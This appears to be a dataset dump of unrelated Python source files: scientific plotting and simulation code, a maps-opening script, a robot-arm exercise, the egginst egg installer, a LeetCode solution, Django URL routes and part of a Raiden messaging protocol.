-9999\" + '\\n')\nf.write(str(doses[3]) + \" 6 8 14 -9999\" + '\\n')\nf.write(str(doses[3]) + \" 6 5 11 -9999\" + '\\n')\nf.write(str(doses[3]) + \" 5 3 8 -9999\" + '\\n')\nf.write(str(doses[3]) + \" 4 6 10 -9999\" + '\\n')\n\nf.close()\nexit()\n\ndef test_executable_path():\n\n parents = (\n bmds.Dichotomous,\n bmds.DichotomousCancer,\n bmds.Continuous,\n )\n\n for name, obj in inspect.getmembers(bmds):\n if inspect.isclass(obj):\n if obj not in parents and issubclass(obj, parents):\n exe = obj.get_exe_path()\n print(obj.__name__, exe)\n assert os.path.exists(exe)\n\n\n@pytest.mark.skipif(sys.platform != \"win32\",\n reason='BMDS can only be executed on Windows')\ndef test_execute(dataset):\n model = bmds.Logistic_213(dataset)\n model.execute()\n assert model.output_created is True\n","sub_path":"D-files/NCTR.py","file_name":"NCTR.py","file_ext":"py","file_size_in_byte":5572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"157207237","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom invisible_cities.core.core_functions import shift_to_bin_centers\n\n\ndef gaussC(x, mu, sigma, N, Ny):\n return N * np.exp(-0.5 *np.power((x - mu)/(sigma),2)) + Ny\n\ndef gauss(x, mu, sigma, N):\n return N * np.exp(-0.5 * np.power((x - mu)/(sigma),2))\n\n\ndef poisson_sigma(x, default=3):\n \"\"\"\n Get the uncertainty of x (assuming it is poisson-distributed).\n Set *default* when x is 0 to avoid null uncertainties.\n \"\"\"\n u = x**0.5\n u[x==0] = default\n return u\n\ndef plot_residuals_E_reso_gaussC(plots_dir, label, energy, e_nbins, e_range, mu, mu_u , sigma, sigma_u, N, N_u, N2,N2_u, chi2_val):\n\n resolution = 235*sigma/mu\n\n sns.set()\n sns.set_style(\"white\")\n sns.set_style(\"ticks\")\n\n fig = plt.figure(figsize=(9,7))\n\n global_linewidth = 2\n global_linecolor = \"r\"\n\n # compute y values from histogram\n e_bins = np.linspace(* e_range , e_nbins + 1)\n entries, e = np.histogram(energy, e_bins)\n e = shift_to_bin_centers(e)\n #e_u = np.diff(e)[0] * 0.5\n entries_u = poisson_sigma(entries)\n #entries_u = entries**0.5\n\n # compute bin width\n w= (e_range[1]- e_range[0])/e_nbins\n\n # compute residuals\n y_from_fit = gaussC(e, mu, sigma, N*w, N2*w )\n residuals = (y_from_fit - entries)/ entries_u\n y_from_fit_1 = gauss(e, mu, sigma, N*w)\n y_from_fit_2 = N2*w\n\n # Plot\n frame_data = plt.gcf().add_axes((.1, .3,.8, .6))\n\n plt.errorbar (e, entries, entries_u, 0, \"p\", c=\"k\", label = 'data')\n plt.plot (e, y_from_fit, lw=global_linewidth, color=global_linecolor, label = 'fit' )\n plt.fill_between(e, y_from_fit_1, 0, alpha=0.3, color='')\n plt.fill_between(e, y_from_fit_2, 0, alpha=0.5, color='pink')\n plt.legend( loc='upper right', numpoints = 1 )\n\n\n textstr = '\\n'.join((\n '$\\mu={:.2f} \\pm {:.2f} $' .format(mu,mu_u),\n '$\\sigma 1={:.2f} \\pm {:.2f}$' .format(sigma, sigma_u),\n '$N 1={:.2f} \\pm {:.2f}$' .format(N, N_u),\n '$N 2={:.2f} \\pm {:.2f}$' .format(N2, N2_u),\n '$\\sigma_E/E = {:.2f} \\% $' .format(resolution,),\n f'$\\chi^2 = {chi2_val:.2f}$'\n ))\n\n\n\n props = dict(boxstyle='square', facecolor='white', alpha=0.5)\n plt.gca().text(0.05, 0.95, textstr, transform=plt.gca().transAxes, fontsize=14,\n verticalalignment='top', bbox=props)\n frame_data.set_xticklabels([])\n\n plt.ylabel(\"Entries\")\n plt.ylim(-10)\n\n # set my own xlimits\n #lims = plt.xlim()\n lims = plt.xlim(e_range[0], e_range[1])\n frame_res = plt.gcf().add_axes((.1, .1, .8, .2))\n plt.plot (lims, [0,0], \"-g\", lw=0.7) # linia en 00 verde\n plt.errorbar(e, residuals, 1, 0, linestyle='None', fmt='|', c=\"k\")\n plt.ylim(-3.9,3.9)\n plt.xlim(e_range[0], e_range[1])\n plt.xlabel(\"E (pes)\")\n #plt.show()\n\n #fix: add save as option\n #plt.savefig(f'{plots_dir}/fit_energy_reso_{label}.png')\n #print('plots saved in '+ plots_dir)\n\n return resolution, fig\n","sub_path":"plotting_functions.py","file_name":"plotting_functions.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"304223656","text":"#! python3\n# mapIt.py\n\nimport webbrowser, sys#, pyperclip\n\nimport subprocess\nsubprocess.call(['pip3', 'install', 'pyperclip'])\ntry:\n import pyperclip\nexcept:\n print(\">>> Error during pyperclip import operation. <<<\" )\n\n# if sys.argv has more than just filename\nif len(sys.argv) > 1:\n # Get address from commad line.\n print(sys.argv) # ['mapIt.py', '...', '...']\n address = \" \".join(sys.argv[1:])\n print(address)\n\nelse:\n # Get the addres from the clipboard\n print(\">>> The address hasn't been provided. <<<\")\n try:\n address = pyperclip.paste()\n except:\n print(\">>> Error during pyperclip .paste() operation. <<<\" )\n print(\"\\n______________________________________________\\n\\n\\\n Providing ERandom address\\n\\\n Jana Pawla II 207\\n\\\n Bialy Dunajec 34-425\\\n \\n______________________________________________\")\n address = \"Jana Pawla II 207 Bialy Dunajec 34-425\"\n\nwebbrowser.open('https://www.google.com/maps/place/' + address)\n","sub_path":"automate_boring_stuff/mapIt.py","file_name":"mapIt.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"460745756","text":"from RobotArm import RobotArm\n\n\nrobotArm = RobotArm('exercise 9')\nrobotArm.speed = 5\n# Jouw python instructies zet je vanaf hier:\n\nfor stapelBlokken in range(1, 5):\n for i in range(stapelBlokken):\n robotArm.grab()\n\n for moveRight in range(5):\n robotArm.moveRight()\n\n robotArm.drop()\n\n for moveLeft in range(5):\n robotArm.moveLeft()\n \n robotArm.moveRight()\n\n \n\n\n# Na jouw code wachten tot het sluiten van de window:\nrobotArm.wait()","sub_path":"robotarm-python-2021-main/oefening9 - kopie.py","file_name":"oefening9 - kopie.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"302288929","text":"# Author: Ilan Schnell \n\"\"\"\\\negginst is a simple tool for installing and uninstalling eggs. Example:\n\n egginst nose-1.3.0-1.egg\n\nThis tool is simple and does not care if the eggs it installs are for the\ncorrect platform, its dependencies installed, etc... You should generally use\nenpkg or Canopy's package manager instead to deal with dependencies correctly.\n\"\"\"\nfrom __future__ import absolute_import, print_function\n\nimport argparse\nimport json\nimport logging\nimport os\nimport posixpath\nimport re\nimport shutil\nimport subprocess\nimport sys\nimport warnings\n\nfrom os.path import abspath, basename, dirname, join, isdir, isfile, normpath, sep\n\ntry:\n import appinst\nexcept ImportError: # pragma: no cover\n appinst = None\n\nfrom . import eggmeta\nfrom . import object_code\nfrom . import scripts\n\nfrom .links import create_link\nfrom .progress import console_progress_manager_factory\nfrom .utils import (on_win, bin_dir_name, rel_site_packages, ensure_dir,\n rm_empty_dir, rm_rf, get_executable, is_zipinfo_dir,\n zip_has_arcname)\nfrom ._zipfile import ZipFile\n\nfrom .vendor.six import StringIO\nfrom .vendor.six.moves import configparser\n\nEGG_INFO = \"EGG-INFO\"\nBOOTSTRAP_ARCNAME = EGG_INFO + \"/spec/__bootstrap__.py\"\n\nR_EGG_INFO = re.compile(\"^{0}\".format(EGG_INFO))\nR_EGG_INFO_BLACK_LIST = re.compile(\n \"^{0}/(usr|spec|PKG-INFO.bak|prefix|.gitignore|\"\n \"inst|post_egginst.py|pre_egguninst.py)\".format(EGG_INFO))\nR_LEGACY_EGG_INFO = re.compile(\"(^.+.egg-info)\")\n\nPY_PAT = re.compile(r'^(.+)\\.py(c|o)?$')\nSO_PAT = re.compile(r'^lib.+\\.so')\nPY_OBJ = '.pyd' if on_win else '.so'\n\nlogger = logging.getLogger(__name__)\n\n\ndef name_version_fn(fn):\n \"\"\"\n Given the filename of a package, returns a tuple(name, version).\n \"\"\"\n if fn.endswith('.egg'):\n fn = fn[:-4]\n if '-' in fn:\n return tuple(fn.split('-', 1))\n else:\n return fn, ''\n\n\ndef is_in_legacy_egg_info(f, is_custom_egg):\n \"\"\"\n Filter out files in legacy egg-info directory, i.e. for eggs as follows:\n\n package/__init__.py\n EGG-INFO/...\n package.egg-info/...\n\n filter out the content of package.egg-info. Only a few eggs were produced\n as above. This version of enstaller will simply copy the required content\n from EGG-INFO where setuptools expects it.\n \"\"\"\n if is_custom_egg:\n if R_LEGACY_EGG_INFO.search(f):\n return True\n else:\n return False\n else:\n return False\n\n\ndef should_copy_in_egg_info(f, is_custom_egg):\n \"\"\"\n Return True if the given archive name needs to be copied in to\n $site-packages/$package_egg_info\n \"\"\"\n if R_EGG_INFO.search(f):\n if is_custom_egg:\n if R_EGG_INFO_BLACK_LIST.search(f):\n return False\n else:\n return True\n else:\n return True\n else:\n return False\n\n\ndef has_legacy_egg_info_format(arcnames, is_custom_egg):\n if is_custom_egg:\n for name in arcnames:\n if R_LEGACY_EGG_INFO.search(name):\n return True\n return False\n else:\n return False\n\n\ndef should_mark_executable(arcname, fn):\n if os.path.islink(fn):\n return False\n if (arcname.startswith(('EGG-INFO/usr/bin/', 'EGG-INFO/scripts/')) or\n fn.endswith(('.dylib', '.pyd', '.so')) or\n (arcname.startswith('EGG-INFO/usr/lib/') and\n SO_PAT.match(fn))):\n return True\n else:\n return False\n\n\ndef should_skip(zp, arcname):\n m = PY_PAT.match(arcname)\n if m and zip_has_arcname(zp, m.group(1) + PY_OBJ):\n # .py, .pyc, .pyo next to .so are not written\n return True\n else:\n return False\n\n\ndef setuptools_egg_info_dir(path):\n \"\"\"\n Return the .egg-info directory name as created/expected by setuptools\n \"\"\"\n filename = basename(path)\n name, version = name_version_fn(filename)\n return \"{0}-{1}.egg-info\".format(name, version)\n\n\ndef install_app(meta_dir, prefix):\n return _install_app_impl(meta_dir, prefix, remove=False)\n\n\ndef remove_app(meta_dir, prefix):\n return _install_app_impl(meta_dir, prefix, remove=True)\n\n\ndef _install_app_impl(meta_dir, prefix, remove=False):\n if appinst is None:\n return\n\n path = join(meta_dir, eggmeta.APPINST_PATH)\n if not isfile(path):\n return\n\n if remove:\n handler = appinst.uninstall_from_dat\n warning = 'uninstalling application item'\n else:\n handler = appinst.install_from_dat\n warning = 'installing application item'\n\n try:\n try:\n handler(path, prefix)\n except TypeError:\n # Old appinst (<= 2.1.1) did not handle the prefix argument (2d\n # arg)\n handler(path)\n except Exception as e:\n logger.warn(\"Warning ({0}):\\n{1!r}\".format(warning, e))\n\n\ndef _run_script(meta_dir, fn, prefix):\n path = join(meta_dir, fn)\n if not isfile(path):\n return\n subprocess.call([scripts.executable, '-E', path, '--prefix', prefix],\n cwd=dirname(path))\n\n\nclass _EggInstRemove(object):\n\n def __init__(self, path, prefix=sys.prefix, noapp=False):\n self.path = path\n self.fn = basename(path)\n name, version = name_version_fn(self.fn)\n self.cname = name.lower()\n self.prefix = abspath(prefix)\n self.noapp = noapp\n\n self.egginfo_dir = join(self.prefix, 'EGG-INFO')\n self.meta_dir = join(self.egginfo_dir, self.cname)\n\n self._files = None\n self._installed_size = None\n\n @property\n def is_installed(self):\n return isdir(self.meta_dir)\n\n @property\n def files(self):\n if self._files is None:\n self._read_uninstall_metadata()\n return self._files\n\n @property\n def installed_size(self):\n if self._installed_size is None:\n self._read_uninstall_metadata()\n return self._installed_size\n\n def _read_uninstall_metadata(self):\n d = read_meta(self.meta_dir)\n\n self._files = [join(self.prefix, f) for f in d['files']]\n self._installed_size = d['installed_size']\n\n def _rm_dirs(self, files):\n dir_paths = set()\n len_prefix = len(self.prefix)\n for path in set(dirname(p) for p in files):\n while len(path) > len_prefix:\n dir_paths.add(path)\n path = dirname(path)\n\n for path in sorted(dir_paths, key=len, reverse=True):\n if not path.rstrip(sep).endswith('site-packages'):\n rm_empty_dir(path)\n\n def remove_iterator(self):\n \"\"\"\n Create an iterator that will remove every installed file.\n\n Example::\n\n from egginst.console import ProgressManager\n\n progress = ProgressManager(...)\n egginst = EggInst(...)\n\n with progress:\n for i, filename in self.remove_iterator():\n print(\"removing file {0}\".format(filename))\n progress(step=i)\n \"\"\"\n if not self.is_installed:\n logger.error(\"Error: Can't find meta data for: {0!r}\".\n format(self.cname))\n return\n\n if not self.noapp:\n remove_app(self.meta_dir, self.prefix)\n _run_script(self.meta_dir, 'pre_egguninst.py', self.prefix)\n\n for n, p in enumerate(self.files):\n n += 1\n\n rm_rf(p)\n if p.endswith('.py'):\n rm_rf(p + 'c')\n rm_rf(p + 'o')\n\n yield p\n\n self._rm_dirs(self.files)\n rm_rf(self.meta_dir)\n rm_empty_dir(self.egginfo_dir)\n\n def remove(self):\n for filename in self.remove_iterator():\n pass\n\n\nclass EggInst(object):\n\n def __init__(self, path, prefix=sys.prefix, hook=False, pkgs_dir=None,\n noapp=False):\n self.path = path\n self.fn = basename(path)\n name, version = name_version_fn(self.fn)\n self.cname = name.lower()\n self.prefix = abspath(prefix)\n self.noapp = noapp\n\n self.bin_dir = join(self.prefix, bin_dir_name)\n\n if self.prefix != abspath(sys.prefix):\n scripts.executable = get_executable(self.prefix)\n\n self.site_packages = join(self.prefix, rel_site_packages)\n self.pyloc = self.site_packages\n self.egginfo_dir = join(self.prefix, 'EGG-INFO')\n self.meta_dir = join(self.egginfo_dir, self.cname)\n\n self.meta_json = join(self.meta_dir, 'egginst.json')\n self.files = []\n\n self._egginst_remover = _EggInstRemove(path, prefix, noapp)\n self._installed_size = None\n self._files_to_install = None\n\n @property\n def installed_size(self):\n \"\"\"\n Return the size (bytes) of the extracted egg.\n \"\"\"\n if self._installed_size is None:\n with ZipFile(self.path) as zp:\n self._installed_size = sum(zp.getinfo(name).file_size for name\n in zp.namelist())\n return self._installed_size\n\n def iter_files_to_install(self):\n return self._lines_from_arcname('EGG-INFO/inst/files_to_install.txt')\n\n def iter_targets(self):\n return self._lines_from_arcname('EGG-INFO/inst/targets.dat')\n\n def _should_create_info(self):\n for arcname in ('EGG-INFO/spec/depend', 'EGG-INFO/info.json'):\n if zip_has_arcname(self.z, arcname):\n return True\n return False\n\n def pre_extract(self):\n if not isdir(self.meta_dir):\n os.makedirs(self.meta_dir)\n\n def post_extract(self, extra_info=None):\n with ZipFile(self.path) as zp:\n self.z = zp\n\n if on_win:\n scripts.create_proxies(self)\n else:\n # XXX: we ignore placeholder hack for enstaller, to avoid error\n # messages related to tests data when updating enstaller\n # (enstaller test data contain some osx/linux binaries)\n if self.cname != \"enstaller\":\n object_code.apply_placeholder_hack(self.files,\n list(self.iter_targets()),\n self.prefix)\n\n self._create_links()\n\n self._entry_points()\n if self._should_create_info():\n eggmeta.create_info(self, extra_info)\n\n scripts.fix_scripts(self)\n\n if not self.noapp:\n install_app(self.meta_dir, self.prefix)\n\n self._write_meta()\n\n _run_script(self.meta_dir, 'post_egginst.py', self.prefix)\n\n def install(self, extra_info=None):\n for currently_extracted_size in self.install_iterator():\n pass\n\n def _create_links(self):\n \"\"\"\n Given the content of the EGG-INFO/inst/files_to_install.txt file,\n create/remove the links listed therein.\n \"\"\"\n for line in self.iter_files_to_install():\n arcname, link = line.split()\n if link == 'False':\n continue\n self.files.append(create_link(arcname, link, self.prefix))\n\n def _entry_points(self):\n lines = list(self._lines_from_arcname('EGG-INFO/entry_points.txt',\n ignore_empty=False))\n if lines == []:\n return\n conf = configparser.ConfigParser()\n data = u'\\n'.join(lines) + '\\n'\n # XXX: hack to workaround 2.6-specific bug with ConfigParser and\n # unicode.\n if sys.version_info < (2, 7, 3):\n conf.readfp(StringIO(data.encode(\"utf8\")))\n else:\n conf.readfp(StringIO(data))\n if ('console_scripts' in conf.sections() or\n 'gui_scripts' in conf.sections()):\n logger.debug('creating scripts')\n scripts.create(self, conf)\n\n def _rel_prefix(self, path):\n return abspath(path).replace(self.prefix, '.').replace('\\\\', '/')\n\n def _write_meta(self):\n d = dict(\n egg_name=self.fn,\n prefix=self.prefix,\n installed_size=self.installed_size,\n files=[self._rel_prefix(p)\n if abspath(p).startswith(self.prefix) else p\n for p in self.files + [self.meta_json]]\n )\n with open(self.meta_json, 'w') as f:\n json.dump(d, f, indent=2, sort_keys=True)\n\n def _lines_from_arcname(self, arcname, ignore_empty=True):\n if zip_has_arcname(self.z, arcname):\n for line in self.z.read(arcname).decode(\"utf8\").splitlines():\n line = line.strip()\n if ignore_empty and line == '':\n continue\n if line.startswith('#'):\n continue\n yield line\n\n def install_iterator(self, extra_info=None):\n \"\"\"\n Create an iterator that will iterate over each archive to be extracted.\n\n Example::\n\n from egginst.console import ProgressManager\n\n progress = ProgressManager(...)\n egginst = EggInst(...)\n\n with progress:\n for n in self.install_iterator():\n progress(step=n)\n \"\"\"\n self.pre_extract()\n\n with ZipFile(self.path) as zp:\n self.z = zp\n\n arcnames = self.z.namelist()\n is_custom_egg = eggmeta.is_custom_egg(self.path)\n\n use_legacy_egg_info_format = has_legacy_egg_info_format(arcnames,\n is_custom_egg)\n\n for arcname in arcnames:\n if use_legacy_egg_info_format:\n n = self._extract_egg_with_legacy_egg_info(arcname,\n is_custom_egg)\n else:\n n = self._extract(arcname, is_custom_egg)\n yield n\n\n self.post_extract(extra_info)\n\n def _extract_egg_with_legacy_egg_info(self, name, is_custom_egg):\n zip_info = self.z.getinfo(name)\n\n if is_in_legacy_egg_info(name, is_custom_egg):\n self._write_legacy_egg_info_metadata(zip_info)\n else:\n self._write_arcname(name)\n\n return zip_info.file_size\n\n def _extract(self, name, is_custom_egg):\n zip_info = self.z.getinfo(name)\n\n self._write_arcname(name)\n if should_copy_in_egg_info(name, is_custom_egg):\n self._write_standard_egg_info_metadata(zip_info)\n\n return zip_info.file_size\n\n def _write_legacy_egg_info_metadata(self, zip_info):\n if is_zipinfo_dir(zip_info):\n return\n\n name = zip_info.filename\n m = R_LEGACY_EGG_INFO.search(name)\n if m:\n legacy_egg_info_dir = m.group(1)\n from_egg_info = posixpath.relpath(name, legacy_egg_info_dir)\n\n dest = join(self.pyloc, setuptools_egg_info_dir(self.path),\n from_egg_info)\n self._write_egg_info_arcname(name, dest)\n else:\n msg = (\"BUG: Unexpected name for legacy egg info in {0}: {1}\".\n format(self.fn, name))\n raise ValueError(msg)\n\n def _write_standard_egg_info_metadata(self, zip_info):\n if is_zipinfo_dir(zip_info):\n return\n\n name = zip_info.filename\n from_egg_info = posixpath.relpath(name, EGG_INFO)\n dest = posixpath.join(self.pyloc, setuptools_egg_info_dir(self.path),\n from_egg_info)\n\n self._write_egg_info_arcname(name, dest)\n\n def _write_egg_info_arcname(self, name, dest):\n ensure_dir(dest)\n source = self.z.open(name)\n try:\n with open(dest, \"wb\") as target:\n shutil.copyfileobj(source, target)\n self.files.append(dest)\n finally:\n source.close()\n\n def _get_dst(self, arcname):\n def _transform_path(arcname, egg_prefix, dest_prefix):\n return abspath(join(dest_prefix, arcname[len(egg_prefix):]))\n\n if on_win:\n scheme = [\n (\"EGG-INFO/prefix/\", self.prefix),\n (\"EGG-INFO/scripts/\", self.bin_dir),\n (\"EGG-INFO/\", self.meta_dir),\n ]\n else:\n scheme = [\n (\"EGG-INFO/prefix/\", self.prefix),\n (\"EGG-INFO/usr/\", self.prefix),\n (\"EGG-INFO/scripts/\", self.bin_dir),\n (\"EGG-INFO/\", self.meta_dir),\n ]\n\n for prefix, dest in scheme:\n if arcname.startswith(prefix):\n return _transform_path(arcname, prefix, dest)\n return _transform_path(arcname, \"\", self.pyloc)\n\n def _write_arcname(self, arcname):\n if arcname.endswith('/') or arcname.startswith('.unused'):\n return\n\n if should_skip(self.z, arcname):\n return\n\n path = self._get_dst(arcname)\n destination = os.path.relpath(path, self.prefix)\n\n self.z.extract_to(arcname, destination, self.prefix)\n self.files.append(path)\n\n if should_mark_executable(arcname, path):\n os.chmod(path, 0o755)\n\n def remove(self):\n return self._egginst_remover.remove()\n\n def remove_iterator(self):\n return self._egginst_remover.remove_iterator()\n\n\ndef read_meta(meta_dir):\n meta_json = join(meta_dir, 'egginst.json')\n if isfile(meta_json):\n with open(meta_json) as fp:\n return json.load(fp)\n return None\n\n\ndef get_installed(prefix=sys.prefix):\n \"\"\"\n Generator returns a sorted list of all installed packages.\n Each element is the filename of the egg which was used to install the\n package.\n \"\"\"\n egg_info_dir = join(prefix, 'EGG-INFO')\n if not isdir(egg_info_dir):\n return\n pat = re.compile(r'([a-z0-9_.]+)$')\n for fn in sorted(os.listdir(egg_info_dir)):\n if not pat.match(fn):\n continue\n d = read_meta(join(egg_info_dir, fn))\n if d is None:\n continue\n yield d['egg_name']\n\n\ndef print_installed(prefix=sys.prefix):\n fmt = '%-20s %s'\n print(fmt % ('Project name', 'Version'))\n print(40 * '=')\n for fn in get_installed(prefix):\n print(fmt % name_version_fn(fn))\n\n\ndef install_egg_cli(path, prefix, noapp=False, extra_info=None):\n \"\"\"\n Simple wrapper to install an egg using default egginst progress bar.\n \"\"\"\n installer = EggInst(path, prefix, False, None, noapp)\n\n progress = console_progress_manager_factory(\"installing egg\", installer.fn,\n size=installer.installed_size)\n with progress:\n for currently_extracted_size in installer.install_iterator(extra_info):\n progress.update(currently_extracted_size)\n\n\ndef remove_egg_cli(path, prefix, noapp=False):\n \"\"\"\n Simple wrapper to remove an egg using default egginst progress bar.\n \"\"\"\n installer = EggInst(path, prefix, False, None, noapp=noapp)\n remover = installer._egginst_remover\n if not remover.is_installed:\n logger.error(\"Error: can't find meta data for: %r\", remover.cname)\n return\n progress = console_progress_manager_factory(\"removing egg\", installer.fn,\n remover.installed_size,\n len(remover.files))\n with progress:\n for filename in remover.remove_iterator():\n progress.update(1)\n\n\ndef main(argv=None):\n if argv is None:\n argv = sys.argv[1:] # pragma: no cover\n\n p = argparse.ArgumentParser(usage=\"usage: %(prog)s [options] [EGGS ...]\",\n description=__doc__,\n formatter_class=argparse.RawTextHelpFormatter)\n\n p.add_argument(\"requirements\", help=\"Requirements to install\", nargs='*')\n\n p.add_argument('-l', \"--list\",\n action=\"store_true\",\n help=\"list all installed packages\")\n\n p.add_argument(\"--noapp\",\n action=\"store_true\",\n help=\"don't install/remove application menu items\")\n\n p.add_argument(\"--prefix\",\n action=\"store\",\n default=sys.prefix,\n help=\"install prefix\",\n metavar='PATH')\n\n p.add_argument(\"--pkgs-dir\",\n action=\"store\",\n help=\"Do nothing, kept for backward compatibility.\",\n metavar='PATH')\n\n p.add_argument('-r', \"--remove\",\n action=\"store_true\",\n help=\"remove package(s), requires the egg or project name(s)\")\n\n p.add_argument('-v', \"--verbose\", action=\"store_true\")\n p.add_argument('--version', action=\"store_true\")\n\n ns = p.parse_args(argv)\n if ns.version:\n # Local import to avoid circular imports between enstaller and egginst\n from enstaller import __version__\n print(\"enstaller version:\", __version__)\n return\n\n prefix = normpath(abspath(ns.prefix))\n if prefix != normpath(sys.prefix):\n warnings.warn(\"Using the --prefix option is potentially dangerous. \"\n \"You should use enpkg installed in {0} instead.\".\n format(ns.prefix))\n\n if ns.list:\n print_installed(prefix)\n return\n\n if ns.verbose:\n logging.basicConfig(level=logging.INFO, format=\"%(message)s\")\n else:\n logging.basicConfig(level=logging.WARN, format=\"%(message)s\")\n\n for path in ns.requirements:\n if ns.remove:\n remove_egg_cli(path, prefix, ns.noapp)\n else:\n install_egg_cli(path, prefix, ns.noapp)\n\n\nif __name__ == '__main__': # pragma: no cover\n main()\n","sub_path":"venv/lib/python2.7/site-packages/egginst/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":21813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"231352611","text":"\"\"\"\nA sequence of numbers is called a wiggle sequence if the differences between successive numbers strictly alternate between positive and negative. The first difference (if one exists) may be either positive or negative. A sequence with fewer than two elements is trivially a wiggle sequence.\n\nFor example, [1,7,4,9,2,5] is a wiggle sequence because the differences (6,-3,5,-7,3) are alternately positive and negative. In contrast, [1,4,7,2,5] and [1,7,4,5,5] are not wiggle sequences, the first because its first two differences are positive and the second because its last difference is zero.\n\nGiven a sequence of integers, return the length of the longest subsequence that is a wiggle sequence. A subsequence is obtained by deleting some number of elements (eventually, also zero) from the original sequence, leaving the remaining elements in their original order.\n\nExample 1:\n\nInput: [1,7,4,9,2,5]\nOutput: 6\nExplanation: The entire sequence is a wiggle sequence.\nExample 2:\n\nInput: [1,17,5,10,13,15,10,5,16,8]\nOutput: 7\nExplanation: There are several subsequences that achieve this length. One is [1,17,10,13,10,16,8].\nExample 3:\n\nInput: [1,2,3,4,5,6,7,8,9]\nOutput: 2\nFollow up:\nCan you do it in O(n) time?\n\n\n\"\"\"\n\n# two array dp\n# Time complexity -- 0(N)\n# Space complexity -- O(1)\n# Runtime: 40 ms, faster than 70.83% of Python3 online submissions for Wiggle Subsequence.\n# Memory Usage: 13.8 MB, less than 10.00% of Python3 online submissions for Wiggle Subsequence.\n# I should learn to use two arraries in dp\nclass Solution:\n def wiggleMaxLength(self, nums: List[int]) -> int:\n n = len(nums)\n if n <= 1:\n return n\n inc, dec = 1, 1\n for x in range(1, n):\n if nums[x] > nums[x - 1]:\n inc = dec + 1\n elif nums[x] < nums[x - 1]:\n dec = inc + 1\n return max(inc, dec)","sub_path":"Widen/LC376_Wiggle_Subsequence.py","file_name":"LC376_Wiggle_Subsequence.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"71917183","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.administrator_page),\n url(r'^new_jd/$', views.new_jd_page),\n url(r'^jd/(?P\\d+)/delete/', views.delete_jd),\n url(r'^jd/(?P\\d+)/create/$', views.create_jd),\n url(r'^new_ssh_key/$', views.new_ssh_key_page),\n url(r'^ssh_key/(?P\\d+)/delete/', views.delete_ssh_key),\n url(r'^ssh_key/(?P\\d+)/create/$', views.create_ssh_key),\n]\n","sub_path":"administrator/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"343164710","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom qutip import *\nomega_1=2*np.pi*5.5\nomega_2=2*np.pi*5.526\ng=2*np.pi*0.1\ndetuning=omega_2-omega_1+0.2*2*np.pi\nA=0.1*np.pi\nH1=Qobj(np.diag([0,1,0,0]),dims=[[2,2],[2,2]])*omega_1\nH2=Qobj(np.diag([0,0,1,0]),dims=[[2,2],[2,2]])*omega_2\nH3=Qobj(np.diag([0,0,0,1]),dims=[[2,2],[2,2]])*(omega_1+omega_2)\nH4=g*(tensor(sigmam(),sigmap())+tensor(sigmap(),sigmam()))\nH0=H1+H2+H3+H4\nHi=Qobj(np.diag([0,1,0,0]),dims=[[2,2],[2,2]])\ndef Hi_coeff(t, args):\n return A*np.cos(detuning*t)\nH = [H0,[Hi,Hi_coeff]]\npsi0=tensor(basis(2,1),basis(2,0))\nt=np.linspace(0,10,10000)\nU=Qobj(np.diag([0,1,0,0]),dims=[[2,2],[2,2]])\nresult=mesolve(H,psi0,t,[],[])\npsit=result.states\nP=expect(U,psit)\nplt.xlabel('time')\nplt.ylabel('Probability')\nplt.plot(t,P)\nplt.show()\n","sub_path":"timedependent.py","file_name":"timedependent.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"156049466","text":"# -*- coding: utf8 -*-\nimport gevent\nfrom ethereum import slogging\n\nfrom raiden.messages import decode, Ack, BaseError, Secret\nfrom raiden.utils import isaddress, sha3, pex\n\nlog = slogging.get_logger(__name__) # pylint: disable=invalid-name\n\n\nclass RaidenProtocol(object):\n \"\"\" Encode the message into a packet and send it.\n\n Each message received is stored by hash and if it is received twice the\n previous answer is resent.\n\n Repeat sending messages until an acknowledgment is received or the maximum\n number of retries is hitted.\n \"\"\"\n\n try_interval = 1.\n max_tries = 5\n max_message_size = 1200\n\n def __init__(self, transport, discovery, raiden):\n self.transport = transport\n self.discovery = discovery\n self.raiden = raiden\n\n self.number_of_tries = dict() # msg hash: count_tries\n self.sent_acks = dict() # msghash: Ack\n\n def send(self, receiver_address, message):\n if not isaddress(receiver_address):\n raise ValueError('Invalid address {}'.format(pex(receiver_address)))\n\n if isinstance(message, (Ack, BaseError)):\n raise ValueError('Do not use send for Ack messages or Errors')\n\n if len(message.encode()) > self.max_message_size:\n raise ValueError('message size exceeds the maximum {}'.format(self.max_message_size))\n\n return gevent.spawn(self._repeat_until_ack, receiver_address, message)\n\n def _repeat_until_ack(self, receiver_address, message):\n data = message.encode()\n host_port = self.discovery.get(receiver_address)\n\n # msghash is removed from the `number_of_tries` once a Ack is\n # received, resend until we receive it or give up\n msghash = sha3(data)\n self.number_of_tries[msghash] = 0\n\n log.info('SENDING {} > {} : [{}] {}'.format(\n pex(self.raiden.address),\n pex(receiver_address),\n pex(msghash),\n message,\n ))\n\n while msghash in self.number_of_tries:\n if self.number_of_tries[msghash] > self.max_tries:\n # FIXME: suspend node + recover from the failure\n raise Exception('DEACTIVATED MSG resents {} {}'.format(\n pex(receiver_address),\n message,\n ))\n\n self.number_of_tries[msghash] += 1\n self.transport.send(self.raiden, host_port, data)\n gevent.sleep(self.try_interval)\n\n def send_ack(self, receiver_address, message):\n if not isaddress(receiver_address):\n raise ValueError('Invalid address {}'.format(pex(receiver_address)))\n\n if not 